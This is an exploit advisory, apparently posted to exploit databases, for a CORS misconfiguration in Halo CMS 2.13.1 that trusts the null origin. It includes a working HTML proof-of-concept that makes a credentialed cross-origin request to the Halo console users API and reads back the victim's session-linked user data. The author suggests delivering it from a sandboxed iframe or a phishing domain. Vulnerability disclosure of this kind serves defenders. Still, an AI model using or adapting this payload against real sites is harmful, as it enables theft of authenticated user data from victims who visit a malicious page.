## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted ## Author: nu11secur1ty ## Date: 03/15/2024 ## Vendor: https://www.halo.run/ ## Software: https://github.com/halo-dev/halo ## Reference: https://portswigger.net/web-security/cors ## Description: The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain. The application allowed access from the requested origin null The application allows two-way interaction from the null origin. This effectively means that any domain can perform two-way interaction by causing the browser to submit the null origin, for example by issuing the request from a sandboxed iframe or malicious fishing domain with a specially crafted HTML exploit. STATUS: HIGH- Vulnerability [+]Exploit: ```HTML <html> <body> <center> <h2>CORS POC Exploit <h3>Extract SID <div id="demo"> <button type="button" onclick="cors()">Exploit Click here </div> <script> function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("demo").innerHTML = alert(this.responseText); } }; xhttp.open("GET", "http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-", true); xhttp.withCredentials = true; xhttp.send(); } </script> </body> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html) ## Time spent: 00:25:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>